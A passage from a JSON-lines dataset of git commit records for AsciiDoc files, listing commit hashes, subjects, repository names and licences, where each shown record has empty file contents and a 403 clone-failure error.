'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"b41f6ce6d59cba03ede1d6e9c16b0a80a942809a","subject":"Checkstyle init","message":"Checkstyle init\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"DevOps\/Checkstyle.adoc","new_file":"DevOps\/Checkstyle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"499412c6e8a9d2e79f1f8f7f0735d84d4f3bbff9","subject":"Update MacOS_X_Challenge-Response.adoc","message":"Update MacOS_X_Challenge-Response.adoc","repos":"eworm-de\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam","old_file":"doc\/MacOS_X_Challenge-Response.adoc","new_file":"doc\/MacOS_X_Challenge-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b02fe30488ecafe4fab77c0f05c0be3bd6eb2391","subject":"Update 2017-01-17-Book-Review.adoc","message":"Update 2017-01-17-Book-Review.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2017-01-17-Book-Review.adoc","new_file":"_posts\/2017-01-17-Book-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a6227ef5bf299fa2453d6784bdcb0583acbac49","subject":"Update 2015-07-27-A-test-title.adoc","message":"Update 2015-07-27-A-test-title.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2015-07-27-A-test-title.adoc","new_file":"_posts\/2015-07-27-A-test-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58fc21d03a556ce5f686a2dae1e50fc04bee30cd","subject":"Update 2018-11-01-gohu-netlify.adoc","message":"Update 2018-11-01-gohu-netlify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-01-gohu-netlify.adoc","new_file":"_posts\/2018-11-01-gohu-netlify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"018950ad86f8047d7e24f5e806806cee4dff9da7","subject":"Update 2018-08-11-sweet-honey.adoc","message":"Update 2018-08-11-sweet-honey.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-08-11-sweet-honey.adoc","new_file":"_posts\/2018-08-11-sweet-honey.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68eb55c14f80e21a86e6593591f7688d20b4e58a","subject":"Update 2016-09-09.adoc","message":"Update 2016-09-09.adoc","repos":"bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io","old_file":"_posts\/2016-09-09.adoc","new_file":"_posts\/2016-09-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitcowboy\/bitcowboy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49424c2eabf28740be3b57c66f90e4e3255f80fe","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66664293a38d35746b8357f0c838b69b1027d7e9","subject":"y2b create post The Drone You've Been Waiting For...","message":"y2b create post The Drone You've Been Waiting For...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-15-The-Drone-Youve-Been-Waiting-For.adoc","new_file":"_posts\/2016-09-15-The-Drone-Youve-Been-Waiting-For.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36b39189b41737356b4307976baf8e3b95555ee6","subject":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","message":"Update 2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_file":"_posts\/2016-11-30-I-went-to-the-A-W-S-headquarters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a78fb838249d40fea9a9afea074d3364582743b","subject":"Update 2016-12-08-My-Development-Environment-Setup.adoc","message":"Update 2016-12-08-My-Development-Environment-Setup.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_file":"_posts\/2016-12-08-My-Development-Environment-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b7b7cbc73c4b85e6c1de7e37e0b65545002e840","subject":"Update 2017-05-12-Verantwortung-Handlung-Intention.adoc","message":"Update 2017-05-12-Verantwortung-Handlung-Intention.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-05-12-Verantwortung-Handlung-Intention.adoc","new_file":"_posts\/2017-05-12-Verantwortung-Handlung-Intention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2510e83f4568af7129fc03e2013147fab9c1002f","subject":"Update 2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","message":"Update 2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","new_file":"_posts\/2012-11-30-jboss-eap-6-51-43-javaee-supported.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1131e3b47d35921e164f1ffdc64fc35dc6381aa","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96183bd8930fb9036879b9acb9ad8491035f5572","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/11\/04\/deref.adoc","new_file":"content\/news\/2022\/11\/04\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f5a3b81b63d61962485be8f80cf9510b4b3f7f02","subject":"Captain's Log FAQ (edit)","message":"Captain's Log FAQ (edit)\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2722fb3bfccd7a8d544cbea4ec3e5340093973bf","subject":"Update 2017-05-19-Rust-in-action.adoc","message":"Update 2017-05-19-Rust-in-action.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"_posts\/2017-05-19-Rust-in-action.adoc","new_file":"_posts\/2017-05-19-Rust-in-action.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa8fd408a8a651b93a2ac7b4033575798ed274cc","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a73c2bbdfb2d644246de285893e5fc4c633a64b8","subject":"Update 2015-03-02-MySQL-Docker.adoc","message":"Update 2015-03-02-MySQL-Docker.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-03-02-MySQL-Docker.adoc","new_file":"_posts\/2015-03-02-MySQL-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60a78c34f157bb445fdb812881559414a4ee404c","subject":"Update 2017-07-18-July-18-2017.adoc","message":"Update 2017-07-18-July-18-2017.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-18-July-18-2017.adoc","new_file":"_posts\/2017-07-18-July-18-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be0fcf5b6915f0c105067f3c91053abd12740a01","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c9df8b3425ff8e7e36a273fbc14026c9cc10c99","subject":"Update 2008-02-18-Non-sense.adoc","message":"Update 2008-02-18-Non-sense.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2008-02-18-Non-sense.adoc","new_file":"_posts\/2008-02-18-Non-sense.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75951ec4e3490794b3286c373488e9b28eecd6ef","subject":"Update 2017-12-31-Seventeen.adoc","message":"Update 2017-12-31-Seventeen.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-12-31-Seventeen.adoc","new_file":"_posts\/2017-12-31-Seventeen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a59df8cd6406146ae5403c09b193d133ef36ba31","subject":"Higher-order README.","message":"Higher-order README.\n","repos":"mstahv\/wildfly-swarm-examples,emag\/wildfly-swarm-examples,wildfly-swarm\/wildfly-swarm-examples,emag\/wildfly-swarm-examples,wildfly-swarm\/wildfly-swarm-examples,mstahv\/wildfly-swarm-examples,wildfly-swarm\/wildfly-swarm-examples,mstahv\/wildfly-swarm-examples,wildfly-swarm\/wildfly-swarm-examples,emag\/wildfly-swarm-examples,wildfly-swarm\/wildfly-swarm-examples,mstahv\/wildfly-swarm-examples,emag\/wildfly-swarm-examples,emag\/wildfly-swarm-examples,emag\/wildfly-swarm-examples,wildfly-swarm\/wildfly-swarm-examples","old_file":"datasource\/README.adoc","new_file":"datasource\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/emag\/wildfly-swarm-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9dedbea86539815bc5f4103763c94a179e2c51f1","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db43bbebf69875582d4517118b558e18b287c7ae","subject":"Update 2017-07-07-Cloud-Spanner.adoc","message":"Update 2017-07-07-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"687ecf72eb580b8fe7b8a68174021ec1cb7667e3","subject":"Clean up and add API items to TEP template","message":"Clean up and add API items to TEP template\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>\n","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/tep\/tep-0001.adoc","new_file":"docs\/tep\/tep-0001.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a82eedab41af251685c5539df5d61e280e741cfa","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2539db0947149752bc6e99638297658b35f57277","subject":"Update 2015-02-13-PHP-and-HTML-Select-field-fur-die-letzten-100-Jahre-inkl-Altersgrenze.adoc","message":"Update 2015-02-13-PHP-and-HTML-Select-field-fur-die-letzten-100-Jahre-inkl-Altersgrenze.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-13-PHP-and-HTML-Select-field-fur-die-letzten-100-Jahre-inkl-Altersgrenze.adoc","new_file":"_posts\/2015-02-13-PHP-and-HTML-Select-field-fur-die-letzten-100-Jahre-inkl-Altersgrenze.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15048c851cfd4f7bdca49305ac93194bb97b845d","subject":"chore(controlable-tests): fix typo","message":"chore(controlable-tests): fix typo\n","repos":"charlenopires\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,cqricky\/promises-book,dieface\/promises-book,charlenopires\/promises-book,charlenopires\/promises-book,lidasong2014\/promises-book,xifeiwu\/promises-book,lidasong2014\/promises-book,azu\/promises-book,genie88\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,wenber\/promises-book,tangjinzhou\/promises-book,liyunsheng\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,genie88\/promises-book,purepennons\/promises-book,liubin\/promises-book,mzbac\/promises-book,purepennons\/promises-book,cqricky\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,tangjinzhou\/promises-book,xifeiwu\/promises-book,genie88\/promises-book,mzbac\/promises-book,wenber\/promises-book,wenber\/promises-book,azu\/promises-book,xifeiwu\/promises-book,tangjinzhou\/promises-book,cqricky\/promises-book,oToUC\/promises-book,azu\/promises-book,wangwei1237\/promises-book,mzbac\/promises-book,azu\/promises-book,liubin\/promises-book,liubin\/promises-book,sunfurong\/promise,oToUC\/promises-book","old_file":"Ch3_Testing\/controlable-tests.adoc","new_file":"Ch3_Testing\/controlable-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1bf90a73128c07d7ae97f0ed187f0020e30d0be","subject":"Update 2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","message":"Update 2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","new_file":"_posts\/2017-03-17-i-have-been-to-J-A-W-S-D-A-Y-S-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15ba0742f5288cbbfe2b4704f03e9f68e20c12da","subject":"Update 2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","message":"Update 2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe9dafaf36544a2cd1f97325aed261f7595fa18a","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io,Vtek\/vtek.github.io","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vtek\/vtek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9aa95816e4c7740cc3e677c715bb03c6b6c4ae65","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-rest-to-soap","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-rest-to-soap.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0afeb2c16952834a83b3a26ff4abbb7beb54c224","subject":"Update 2016-12-01-hello-world.adoc","message":"Update 2016-12-01-hello-world.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2016-12-01-hello-world.adoc","new_file":"_posts\/2016-12-01-hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d71f3ca9d5bf07c5c218d1265f155524f75494f","subject":"Cleanup usage of HTTPS","message":"Cleanup usage of HTTPS\n","repos":"DongsunPark\/bookmarks,wangcan2014\/tut-bookmarks,razordaze\/tut-bookmarks,Sheparzo\/tut-bookmarks","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DongsunPark\/bookmarks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a21ceef292d50fa4959fcaab017b69551377947a","subject":"Updated documentation","message":"Updated documentation","repos":"RobWin\/circuitbreaker-java8,resilience4j\/resilience4j,mehtabsinghmann\/resilience4j,drmaas\/resilience4j,drmaas\/resilience4j,resilience4j\/resilience4j,RobWin\/javaslang-circuitbreaker,javaslang\/javaslang-circuitbreaker,storozhukBM\/javaslang-circuitbreaker,goldobin\/resilience4j","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1c8c0ad12f52147f7238329f73218086916fef88","subject":"Update instructions for publishing changes to the live site","message":"Update instructions for publishing changes to the live site\n\nChange-Id: I7fc1a40d6deedf8eb1a9d8e6d13f803f6109c06b\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/8059\nReviewed-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\nTested-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"960efe62028ed069f89a3a9a56af068957e21fe9","subject":"Fixed typo in cat indices docs","message":"Fixed typo in cat indices docs\n","repos":"alexshadow007\/elasticsearch,s1monw\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,LewayneNaidoo\/elasticsearch,scottsom\/elasticsearch,JSCooke\/elasticsearch,scottsom\/elasticsearch,nilabhsagar\/elasticsearch,njlawton\/elasticsearch,artnowo\/elasticsearch,scorpionvicky\/elasticsearch,jimczi\/elasticsearch,nilabhsagar\/elasticsearch,maddin2016\/elasticsearch,JervyShi\/elasticsearch,mikemccand\/elasticsearch,nazarewk\/elasticsearch,alexshadow007\/elasticsearch,lks21c\/elasticsearch,JSCooke\/elasticsearch,ZTE-PaaS\/elasticsearch,nilabhsagar\/elasticsearch,a2lin\/elasticsearch,mjason3\/elasticsearch,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,spiegela\/elasticsearch,i-am-Nathan\/elasticsearch,LeoYao\/elasticsearch,IanvsPoplicola\/elasticsearch,sneivandt\/elasticsearch,HonzaKral\/elasticsearch,wuranbo\/elasticsearch,rajanm\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,fred84\/elasticsearch,StefanGor\/elasticsearch,strapdata\/elassandra,winstonewert\/elasticsearch,obourgain\/elasticsearch,obourgain\/elasticsearch,jprante\/elasticsearch,mortonsykes\/elasticsearch,gfyoung\/elasticsearch,sneivandt\/elasticsearch,elasticdog\/elasticsearch,i-am-Nathan\/elasticsearch,liweinan0423\/elasticsearch,fernandozhu\/elasticsearch,elasticdog\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,fforbeck\/elasticsearch,umeshdangat\/elasticsearch,bawse\/elasticsearch,wuranbo\/elasticsearch,mikemccand\/elasticsearch,mjason3\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,robin13\/elasticsearch,Helen-Zhao\/elasticsearch,glefloch\/elasticsearch,StefanGor\/elasticsearch,gfyoung\/elasticsearch,fforbeck\/elasticsearch,henakamaMSFT\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,glefloch\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,JackyMai\/elasticsearch,sneivandt\/elasticsearch,henakamaMSFT\/elasticsearch,jprante\/elasticsearch,JervyShi\/elasticsearch,jimczi\/elasticsearch,Shepard1212\/elasticsearch,yanjunh\/elasticsearch,robin13\/elasticsearch,winstonewert\/elasticsearch,wangtuo\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,dongjoon-hyun\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,umeshdangat\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,JervyShi\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,mortonsykes\/elasticsearch,kalimatas\/elasticsearch,glefloch\/elasticsearch,yanjunh\/elasticsearch,IanvsPoplicola\/elasticsearch,JervyShi\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,liweinan0423\/elasticsearch,GlenRSmith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JackyMai\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,brandonkearby\/elasticsearch,scorpionvicky\/elasticsearch,naveenhooda2000\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,mikemccand\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,fforbeck\/elasticsearch,Helen-Zhao\/elasticsearch,brandonkearby\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,gingerwizard\/elasticsearch,a2lin\/elasticsearch,nazarewk\/elasticsearch,vroyer\/elasticassandra,ThiagoGarciaA